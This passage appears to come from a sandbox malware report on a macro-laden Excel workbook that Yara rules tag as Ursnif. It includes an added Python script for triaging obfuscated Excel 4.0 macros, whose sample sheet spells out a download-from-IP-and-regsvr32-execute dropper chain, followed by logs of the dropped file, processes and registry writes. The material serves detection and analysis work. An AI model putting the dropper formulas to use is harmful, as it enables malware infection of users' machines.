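            The three Excel 4.0 findings above (an EXEC formula, an abnormally large hidden macro sheet, and 97 CHAR() calls) are the usual shape of a CHAR-obfuscated XLM dropper. The following is an added example, not part of the Joe Sandbox report and not the macro from Rrapporto.xlsb: it takes formula strings already extracted from a workbook (extraction from a .xlsb needs a BIFF12-aware tool such as olevba or XLMMacroDeobfuscator, assumed to have run), counts CHAR() usage, folds CHAR(n)&"literal"&... runs back into readable strings, and flags hidden sheets that call EXEC, CALL or similar or that name a download API. The sheets and formulas are constructed; the regsvr32 command line and the CALL arguments are illustrative, not recovered from the sample.

```python
"""
Triage of Excel 4.0 (XLM) macro formulas: count CHAR() calls, fold runs of
CHAR(n)/"literal" joined by & back into one string, and flag formulas that
call EXEC/CALL/REGISTER or name download APIs. Added example; the sheets
below are constructed, not extracted from Rrapporto.xlsb.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# XLM functions worth a second look; EXEC is the one this report flags.
SUSPICIOUS_FUNCS = {"EXEC", "CALL", "REGISTER", "FORMULA", "FORMULA.FILL", "RUN"}
CHAR_RE = re.compile(r"CHAR\((\d+)\)")
# A single piece: CHAR(n) or a quoted literal (Excel doubles embedded quotes).
PIECE_RE = re.compile(r'CHAR\((\d+)\)|"((?:[^"]|"")*)"')
# One piece followed by zero or more "& piece"; a lone literal round-trips unchanged.
RUN_RE = re.compile(r'(?:CHAR\(\d+\)|"(?:[^"]|"")*")(?:\s*&\s*(?:CHAR\(\d+\)|"(?:[^"]|"")*"))*')
# Upper-case function name directly followed by "(", outside of mixed-case API strings.
FUNC_RE = re.compile(r"(?<![A-Z0-9.])([A-Z][A-Z0-9.]*)\s*\(")
API_RE = re.compile(r"URLDownloadToFile|ShellExecute|WinExec|CreateProcess")


@dataclass
class MacroSheet:
    name: str
    state: str                      # "visible", "hidden" or "veryhidden"
    formulas: List[str] = field(default_factory=list)


def fold_char_concat(formula: str) -> str:
    """Collapse CHAR(n)&"lit"&CHAR(m)... runs into a single quoted literal."""
    def join(m):
        text = "".join(
            chr(int(code)) if code else lit.replace('""', '"')
            for code, lit in PIECE_RE.findall(m.group(0))
        )
        return '"' + text.replace('"', '""') + '"'
    return RUN_RE.sub(join, formula)


def suspicious_calls(formula: str) -> List[str]:
    """Flagged XLM functions called in a (folded) formula, in order of appearance."""
    return [f for f in FUNC_RE.findall(formula) if f in SUSPICIOUS_FUNCS]


def triage_sheet(sheet: MacroSheet) -> Dict:
    """Per-sheet indicators: hidden state, CHAR() count, flagged calls, API names, folded formulas."""
    raw = "\n".join(sheet.formulas)
    folded = [fold_char_concat(f) for f in sheet.formulas]
    return {
        "sheet": sheet.name,
        "hidden": sheet.state != "visible",
        "char_calls": len(CHAR_RE.findall(raw)),
        "suspicious_calls": sorted({c for f in folded for c in suspicious_calls(f)}),
        "api_strings": sorted({m.group(0) for f in folded for m in API_RE.finditer(f)}),
        "folded": folded,
    }


def flagged_sheets(sheets: List[MacroSheet]) -> List[str]:
    """Hidden sheets that either obfuscate with CHAR() or call a flagged function."""
    out = []
    for s in sheets:
        r = triage_sheet(s)
        if r["hidden"] and (r["char_calls"] > 0 or r["suspicious_calls"]):
            out.append(s.name)
    return out


# Constructed sample: one benign visible sheet and one very-hidden macro sheet whose
# EXEC argument spells "regsvr32" with CHAR() calls (illustrative, not the sample's code).
SAMPLE_SHEETS = [
    MacroSheet("Sheet1", "visible", ["=SUM(A1:A3)"]),
    MacroSheet("Macro1", "veryhidden", [
        r'=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://45.138.72.84/10.11nov322.gif","C:\ProgramData\Dori.ocx",0,0)',
        r'=EXEC(CHAR(114)&CHAR(101)&CHAR(103)&CHAR(115)&CHAR(118)&CHAR(114)&CHAR(51)&CHAR(50)&" C:\ProgramData\Dori.ocx")',
        "=HALT()",
    ]),
]

if __name__ == "__main__":
    for s in SAMPLE_SHEETS:
        r = triage_sheet(s)
        print(f"{r['sheet']}: hidden={r['hidden']} CHAR()={r['char_calls']} "
              f"calls={r['suspicious_calls']} apis={r['api_strings']}")
        for f in r["folded"]:
            print("   ", f)
    print("flagged:", flagged_sheets(SAMPLE_SHEETS))
```

            Folding is done before the function scan so that a name assembled entirely from CHAR() calls and passed to FORMULA() or EXEC() still reads as text; the count of CHAR() calls is taken from the raw formulas, which is the quantity the "High usage of CHAR() function" signature reports.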
            Office process drops PE file
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\ProgramData\Dori.ocx
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\10.11nov322[1].gif
            Writes or reads registry keys via WMI
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMI
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: Joe Sandbox View | Dropped File: C:\ProgramData\Dori.ocx 7A5E4FD35A1A636EF1BEB7E62CC647D7E63F5C7AADD2AA1A49D49C81183ACA93
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\10.11nov322[1].gif 7A5E4FD35A1A636EF1BEB7E62CC647D7E63F5C7AADD2AA1A49D49C81183ACA93
            Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
            Source: classification engine | Classification label: mal100.bank.troj.expl.evad.winXLSB@21/85@7/2
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Rrapporto.xlsb
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{3D6002A5-3C2F-4D7A-9909-C104E420DDD5} - OProcSessId.dat
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from win32_process
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
            Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
            Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\ProgramData\Dori.ocx
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5104 CREDAT:17410 /prefetch:2
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1296 CREDAT:17410 /prefetch:2
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2856 CREDAT:17410 /prefetch:2
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4676 CREDAT:17410 /prefetch:2
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5492 CREDAT:17410 /prefetch:2
            Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4476 CREDAT:17410 /prefetch:2
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\ProgramData\Dori.ocx
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5104 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1296 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2856 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4676 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5492 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4476 CREDAT:17410 /prefetch:2
            Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: Rrapporto.xlsb | Initial sample: OLE zip file path = xl/media/image1.png
            Source: Rrapporto.xlsb | Initial sample: OLE zip file path = xl/media/image2.png
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_3_05AA2846 push ds; iretd 1_3_05AA2847
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\ProgramData\Dori.ocx
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\10.11nov322[1].gif

            Hooking and other Techniques for Hiding and Protection:

            Yara detected Ursnif
            Source: Yara match | File source: 00000001.00000003.667994704.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.668473808.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.668884278.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.668415771.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.668296205.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.667535091.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.667824445.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.668952879.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.667736217.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.667639814.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.668760618.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.668844490.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.668083281.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.668527386.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.668803877.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.669148269.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.668230712.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.669122907.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.669084633.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.668920606.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.667912734.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.669040349.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.667438738.0000000005AA0000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.669